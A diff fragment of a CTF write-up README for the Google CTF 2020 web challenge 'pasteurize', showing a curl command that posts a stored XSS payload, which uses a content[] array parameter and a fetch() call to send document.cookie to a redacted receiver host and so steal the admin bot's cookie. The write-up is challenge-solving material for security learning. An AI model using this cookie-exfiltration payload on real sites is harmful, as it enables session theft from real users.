LalaNguyen/CTF/Year-2020/GOOGLE-CTF/web/pasteurize/README.md

 ```

 We use pipedream.com to host our http receive server.
-We then use the following payload to obtain cookie of Mike:
+We then use the following payload to post the payload, share it with Mike and obtain his cookie:

 ```bash
 curl -v https://pasteurize.web.ctfcompetition.com/ -d "content[]=;fetch('https://REDACT/'%2bdocument.cookie);"